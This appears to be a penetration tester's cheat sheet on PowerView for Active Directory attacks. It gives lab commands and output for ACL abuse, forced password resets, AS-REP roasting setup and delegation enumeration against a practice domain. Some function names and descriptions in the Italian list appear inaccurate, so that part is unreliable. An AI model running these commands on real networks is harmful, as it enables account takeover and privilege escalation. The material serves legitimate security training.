PowerView

https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1

Command

Description

Export-PowerViewCSV

Append results to a CSV file

ConvertTo-SID

Convert a User or group name to its SID value

Get-DomainSPNTicket

Requests the Kerberos ticket for a specified Service Principal Name (SPN) account

Domain/LDAP Functions:

Get-Domain

Will return the AD object for the current (or specified) domain

Get-DomainController

Return a list of the Domain Controllers for the specified domain

Get-DomainUser

Will return all users or specific user objects in AD

Get-DomainComputer

Will return all computers or specific computer objects in AD

Get-DomainGroup

Will return all groups or specific group objects in AD

Get-DomainOU

Search for all or specific OU objects in AD

Find-InterestingDomainAcl

Finds object ACLs in the domain with modification rights set to non-built in objects

Get-DomainGroupMember

Will return the members of a specific domain group

Get-DomainFileServer

Returns a list of servers likely functioning as file servers

Get-DomainDFSShare

Returns a list of all distributed file systems for the current (or specified) domain

GPO Functions:

Get-DomainGPO

Will return all GPOs or specific GPO objects in AD

Get-DomainPolicy

Returns the default domain policy or the domain controller policy for the current domain

Computer Enumeration Functions:

Get-NetLocalGroup

Enumerates local groups on the local or a remote machine

Get-NetLocalGroupMember

Enumerates members of a specific local group

Get-NetShare

Returns open shares on the local (or a remote) machine

Get-NetSession

Will return session information for the local (or a remote) machine

Test-AdminAccess

Tests if the current user has administrative access to the local (or a remote) machine

Threaded 'Meta'-Functions:

Find-DomainUserLocation

Finds machines where specific users are logged in

Find-DomainShare

Finds reachable shares on domain machines

Find-InterestingDomainShareFile

Searches for files matching specific criteria on readable shares in the domain

Find-LocalAdminAccess

Find machines on the local domain where the current user has local administrator access

Domain Trust Functions:

Get-DomainTrust

Returns domain trusts for the current domain or a specified domain

Get-ForestTrust

Returns all forest trusts for the current forest or a specified forest

Get-DomainForeignUser

Enumerates users who are in groups outside of the user's domain

Get-DomainForeignGroupMember

Enumerates groups with users outside of the group's domain and returns each foreign member

Get-DomainTrustMapping

Will enumerate all trusts for the current domain and any others seen.

Creating a List of Domain Users

PS> Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > ad_users.txt

Find Interesting ACL

Find-InterestingDomainAcl

Covert NameToSID

PS C:\htb> $sid = Convert-NameToSid wley

Using Get-DomainObjectACL

Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}

Get ActiveDirectoryRights

Permessi interessanti:

GenericAll - full rights to the object (add users to a group or reset user's password)
GenericWrite - update object's attributes (i.e logon script)
WriteOwner - change object owner to attacker controlled user take over the object
WriteDACL - modify object's ACEs and give attacker full control right over the object
AllExtendedRights - ability to add user to a group or reset password
ForceChangePassword - ability to change user's password
Self (Self-Membership) - ability to add yourself to a group

Get-ObjectAcl -SamAccountName <samaccountname> -ResolveGUIDs


Get-ObjectAcl -SamAccountName carole.holmes -ResolveGuids | ? {$_.ActiveDirectoryRights -match ("WriteDacl|GenericWrite|GenericAll") }

Resolving GUID

Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}

Change Password Force-Change-Password

PS C:\htb> $SecPassword = ConvertTo-SecureString '<PASSWORD HERE>' -AsPlainText -Force
PS C:\htb> $Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword)

PS C:\htb> $damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
PS C:\htb> cd C:\Tools\
PS C:\htb> Import-Module .\PowerView.ps1
PS C:\htb> Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose

VERBOSE: [Get-PrincipalContext] Using alternate credentials
VERBOSE: [Set-DomainUserPassword] Attempting to set the password for user 'damundsen'
VERBOSE: [Set-DomainUserPassword] Password for user 'damundsen' successfully reset

Get User Group Member

PS C:\Tools> Get-NetLocalGroupMember  -GroupName "Remote Management Users"

ComputerName : ACADEMY-EA-MS01
GroupName    : Remote Management Users
MemberName   : INLANEFREIGHT\forend
SID          : S-1-5-21-3842939050-3880317879-2865463114-5614
IsGroup      : False
IsDomain     : UNKNOWN

PS C:\Tools> Get-DomainGroupMember -Identity "Remote Management Users" -Recurse

GroupDomain             : INLANEFREIGHT.LOCAL
GroupName               : Remote Management Users
GroupDistinguishedName  : CN=Remote Management Users,CN=Builtin,DC=INLANEFREIGHT,DC=LOCAL
MemberDomain            : INLANEFREIGHT.LOCAL
MemberName              : bdavis
MemberDistinguishedName : CN=Brian Davis,OU=Server Admin,OU=IT,OU=HQ-NYC,OU=Employees,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
MemberObjectClass       : user
MemberSID               : S-1-5-21-3842939050-3880317879-2865463114-1162

AS-REPRoasting

PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> Get-DomainUser -UACFilter DONT_REQ_PREAUTH
...

Set DONT_REQ_PREAUTH with PowerView

PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> Set-DomainObject -Identity userName -XOR @{useraccountcontrol=4194304} -Verbose

VERBOSE: [Get-DomainSearcher] search base: LDAP://DC01.INLANEFREIGHT.LOCAL/DC=INLANEFREIGHT,DC=LOCAL
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=userName)(name=userName)(displayname=userName))))
VERBOSE: [Set-DomainObject] XORing 'useraccountcontrol' with '4194304' for object 'userName'

Informazioni sull'Active Directory

Get-NetDomain: Ottiene informazioni sul dominio corrente.
Get-NetForest: Ottiene informazioni sulla foresta corrente.
Get-NetDomainController: Ottiene i controller di dominio nel dominio corrente.
Get-NetGroup: Ottiene informazioni sui gruppi dell'Active Directory.
Get-NetUser: Ottiene informazioni sugli utenti dell'Active Directory.
Get-NetComputer: Ottiene informazioni sui computer dell'Active Directory.
Get-NetOU: Ottiene informazioni sulle unità organizzative dell'Active Directory.

Enumerazione

Get-NetGroupMember: Ottiene i membri di un gruppo.
Get-NetLocalGroup: Ottiene i gruppi locali su un computer remoto.
Get-NetLocalGroupMember: Ottiene i membri di un gruppo locale su un computer remoto.
Get-NetShare: Ottiene le condivisioni di rete su un computer remoto.
Get-NetLoggedon: Ottiene gli utenti attualmente collegati a un computer remoto.

Esplorazione dei privilegi

Find-LocalAdminAccess: Trova gli account utente che hanno accesso di amministratore locale su computer remoti.
Find-DomainUserLocation: Trova i computer ai quali un utente ha accesso.
Find-InterestingDomainShareFile: Trova file condivisi interessanti all'interno dell'Active Directory.

Esplorazione delle relazioni di trust

Get-NetDomainTrust: Ottiene le relazioni di trust tra domini.
Get-NetForestTrust: Ottiene le relazioni di trust tra foreste.

Esecuzione remota

Invoke-NetCommand: Esegue un comando in remoto su uno o più computer.

Enumerazione delle autorizzazioni

Get-NetFilePermissions: Ottiene le autorizzazioni dei file su un computer remoto.
Get-NetSharePermissions: Ottiene le autorizzazioni delle condivisioni di rete su un computer remoto.
Get-NetLocalGroupMapping: Ottiene la mappatura dei gruppi locali su un computer remoto.
Get-NetEffectivePermission: Ottiene le autorizzazioni effettive di un utente o gruppo su una risorsa.

Enumerazione dei servizi

Get-NetService: Ottiene informazioni sui servizi in esecuzione su un computer remoto.
Get-NetLoggedon: Ottiene gli utenti attualmente collegati a un computer remoto.

Enumerazione dei token

Get-NetToken: Ottiene informazioni sui token utente e di sistema su un computer remoto.

Enumerazione delle sessioni

Get-NetSession: Ottiene le sessioni di rete su un computer remoto.
Get-NetLoggedon: Ottiene gli utenti attualmente collegati a un computer remoto.

Enumerazione dei trust

Get-NetDomainTrust: Ottiene le relazioni di trust tra domini.
Get-NetForestTrust: Ottiene le relazioni di trust tra foreste.

Gestione dei SID History

Invoke-NetUserAdd: Aggiunge un SID a un account utente.
Invoke-NetUserClone: Clona un account utente, inclusi gli attributi SID History.

Gestione del dominio

Add-NetGroupMember: Aggiunge un membro a un gruppo dell'Active Directory.
Add-NetGroupUser: Aggiunge un utente a un gruppo dell'Active Directory.
Add-NetLocalGroupMember: Aggiunge un membro a un gruppo locale su un computer remoto.

Kerberos Delegation

User Unconstrained Delegation

Get-NetUser | Where-Object { $_.TrustedForDelegation }

Constrained Delegation

Get-DomainComputer -TrustedToAuth

FindUser With ActiveDirectoryRights (WriteDacl|GenericWrite|GenericAll)

 Get-ObjectAcl -SamAccountName carole.holmes -ResolveGuids | ? {$_.ActiveDirectoryRights -match ("WriteDacl|GenericWrite|GenericAll") }

Retrieving Domain SID

PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> Get-DomainSID

S-1-5-21-2974783224-3764228556-2640795941

General Tips

PreviousbloodyAD Nextcertipy

Last updated 2 months ago

PS C:\htb> $SecPassword = ConvertTo-SecureString '<PASSWORD HERE>' -AsPlainText -Force PS C:\htb> $Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword) PS C:\htb> $damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force PS C:\htb> cd C:\Tools\ PS C:\htb> Import-Module .\PowerView.ps1 PS C:\htb> Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose VERBOSE: [Get-PrincipalContext] Using alternate credentials VERBOSE: [Set-DomainUserPassword] Attempting to set the password for user 'damundsen' VERBOSE: [Set-DomainUserPassword] Password for user 'damundsen' successfully reset

PS C:\Tools> Get-NetLocalGroupMember -GroupName "Remote Management Users" ComputerName : ACADEMY-EA-MS01 GroupName : Remote Management Users MemberName : INLANEFREIGHT\forend SID : S-1-5-21-3842939050-3880317879-2865463114-5614 IsGroup : False IsDomain : UNKNOWN PS C:\Tools> Get-DomainGroupMember -Identity "Remote Management Users" -Recurse GroupDomain : INLANEFREIGHT.LOCAL GroupName : Remote Management Users GroupDistinguishedName : CN=Remote Management Users,CN=Builtin,DC=INLANEFREIGHT,DC=LOCAL MemberDomain : INLANEFREIGHT.LOCAL MemberName : bdavis MemberDistinguishedName : CN=Brian Davis,OU=Server Admin,OU=IT,OU=HQ-NYC,OU=Employees,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL MemberObjectClass : user MemberSID : S-1-5-21-3842939050-3880317879-2865463114-1162

PS C:\Tools> Import-Module .\PowerView.ps1 PS C:\Tools> Set-DomainObject -Identity userName -XOR @{useraccountcontrol=4194304} -Verbose VERBOSE: [Get-DomainSearcher] search base: LDAP://DC01.INLANEFREIGHT.LOCAL/DC=INLANEFREIGHT,DC=LOCAL VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=userName)(name=userName)(displayname=userName)))) VERBOSE: [Set-DomainObject] XORing 'useraccountcontrol' with '4194304' for object 'userName'